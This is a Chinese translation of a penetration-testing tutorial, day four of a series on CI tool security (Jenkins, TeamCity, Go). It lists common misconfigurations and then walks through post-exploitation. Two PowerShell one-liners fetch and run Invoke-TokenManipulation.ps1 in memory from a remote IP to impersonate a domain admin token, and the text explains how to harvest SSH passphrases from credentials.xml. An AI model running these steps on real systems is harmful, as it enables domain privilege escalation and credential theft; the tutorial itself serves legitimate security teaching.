CI工具一周课程Day 4:常见问题集合及利用

欢迎来到CI工具一周教程的第四天。我们将在这一个系列教程中讨论CI工具的安全问题。

今天是第四天的课程,其他课程如下所示:

第一天 - Jenkins(和Hudson)[]  第二天 - TeamCity[]  第三天 - Go和CruiseControl  第四天 - 常见问题集合及利用  第五天 - 防御措施和讨论其他一些事

今天主要讨论CI工具常见问题集合及其利用。

在过去的三天,我们讨论了针对Jenkins(和Hudson)、TeamCity、CruiseControl和Go(非常简单)的不同攻击方式。留心的读者会发现这些攻击方式非常相似,都是由于系统错误的配置、缺乏安全防护措施以及滥用功能导致的。下面让我们挑选一些工具来进行讲解。

常见问题集合

从之前的教程我们了解到CI工具的常见问题主要表现为:

1.缺乏基本和通用的安全控制      - 缺乏应对暴力破解攻击的保护措施      - 不安全的存储SSH密钥和凭证      - 无论在主从节点的Windows系统上都以很高的权限运行  2.总是以系统权限执行命令  3.错误的配置      - 在主节点上运行代理      - 公共实例上所有用户具有读权限      - 使用HTTP进行登录      - 主从节点之间的通信没有进行加密  4.用户安全意识差      - 构建参数中包含密码      - 常使用用户名作为密码  5.许多公共实例(即公网可以访问的)

下面我们来快速了解下这些问题:

缺乏安全机制

1.认证

缺乏抵御像暴力破解攻击这种的基本安全机制。事实上,Jenkins和Go在默认安装后根本就没有任何安全认证措施。如果你已经看过我前三天的教程了,你就会发现还是比较容易在公网上发现默认安装的公共实例。这说明CI工具本身存在一些安全问题,而不是一些企业缺乏相应的安全控制机制。

CI工具一周课程Day 4:常见问题集合及利用

2.不安全的存储凭证/SSH密钥

在所有的测试中发现全部或部分的凭证和SSH密钥都存储在不安全的文件格式中。几乎所有的SSH密钥都是以明文形式存储的,Jenkins中加密的凭证也很容易恢复出明文。很难以置信这些CI工具现在依旧这样。

3.权限

在Windows上所有的CI工具都是以系统或者管理员权限运行的。无论在主从节点上都是这样。这就使得攻击者通过命令执行可以收获到丰厚的成果。

命令执行

CI工具允许通过增加构建步骤来在执行系统命令这使得它们非常特别。在大部分广泛应用于企业的工具中,可以直接执行操作系统命令的工具相当罕见。这就使得CI工具很为了一个富有价值的攻击目标。随着大规模的分布式构建以及所有节点统一由主节点控制,使得攻击者可以在主节点上面操纵大量的子节点。

错误的配置

主节点上启用代理

几乎所有的CI工具文档上面都不推荐在主节点上面执行构建或运行代理。但是,Jenkins默认情况下仍然会在主节点上安装,TeamCity也提供对应的安装包。只有Go需要用户单独下载一个安装包来使得在主节点上启用代理。我们已经见识过如果在主节点上启用了代理,那么我们所有的安全措施都将变成徒劳。

对于CI工具我们还可以进行很多有趣的事,而不仅仅只是弹回一个反向Shell。

域管理员

因为我们讨论的CI工具支持分布式,所以在企业环境下,我们很可能在一些机器上找到具有很好权限的用户凭证(像本地管理员或域管理员)。注意,即使主节点运行在*nix上,但是几乎所有的子节点都还是运行在Windows上的。

让我们假设如下情况。我们已经进入Jenkins或其他CI工具,并具有在子节点上配置构建的权限,而其中一个子节点上拥有一个域管理员权限的进程。我们可以利用PowerShell(或者其他工具)来进行枚举、重用token并最终提权到域管理员。我们可以使用Invoke-TokenManipulation来进行枚举和模拟。我们可以使用下面的代码在Jenkins上构建步骤,使其下载并在内存中执行脚本命令。

powershell -c "iex(New-Object Net.WebClient).DownloadString('http://[IPAddress]/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation"

由于Jenkins以系统权限运行,这段代码会列出所有可用的token。

CI工具一周课程Day 4:常见问题集合及利用

注意这里有一个域管理员的token。现在我们可以使用以下命令来在Jenkins内存中运行Invoke-TokenManipulation,通过token来模拟域管理员并在域控制器上执行Get-Process命令行命令。

powershell -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.230.1/Invoke-TokenManipulation.ps1');Get-Process -Id 364 | Invoke-TokenManipulation -ImpersonateUser;Get-Process -Computername pfptlab-dc"

执行结果如下图所示: 

CI工具一周课程Day 4:常见问题集合及利用

很好!我们以域管理员的身份在域控制器上执行了命令。这些很容易吗?那你可以在得到授权的环境下自己尝试一些有趣的事情。

请注意,这里我们假设已经枚举出了域管理员的名称并配置好了域控制器。另外,如果我们在已经进入的子节点中没有找到任何特权用户,那么我们可以使用这个子节点作为跳板尝试访问网内其他的机器。注意,在域内尝试访问其他机器的时候我们需要伪造成子节点的域用户。

Linux机器

在对CI工具进行测试中,我经常能获取不少的SSH密钥。这些SSH密钥可以直接用来访问Linux主机。

再让我们来假设如下情况。我们已经进入了Jenkins的一个实例。我们使用获取到的SSH密钥进行登录到Linux机器(root或者其他用户取决于获取到SSH密钥)。在第一天的教程中已经讲过,Jenkins中的SSH密钥存储在$JENKINS_HOME或者credentials.xml文件中。我们也可以获取到密码短语(passphrase)。通常,利用这些我们可以登录到大量的子节点上。

下面让我们读取credentials.xml文件,并看看其中是否存储有用户SSH的私钥。

CI工具一周课程Day 4:常见问题集合及利用


看起来我们获得了一个名为"ubuntuadmin"用户的密码短语(加密的)。这个加密的密码短语我们可以使用第一天介绍的方法解开。现在,唯一的问题就是这些密码在哪些机器上可以使用。我们可以通过查看构建日志来寻找这些密码在哪里使用过,也可以简单的在所有的Linux机器上尝试登陆。

另外,为了在Putty中使用这些密码,我们需要使用puttygen来转换格式。

CI工具一周课程Day 4:常见问题集合及利用

然后:

CI工具一周课程Day 4:常见问题集合及利用

此外,源码仓库、版本控制系统和数据库也是黑客在进入CI工具后的常见目标。

视频演示

*原文地址:labofapenetrationtester ,FB小编xiaix编译,转自须注明来自FreeBuf黑客与极客(FreeBuf.COM)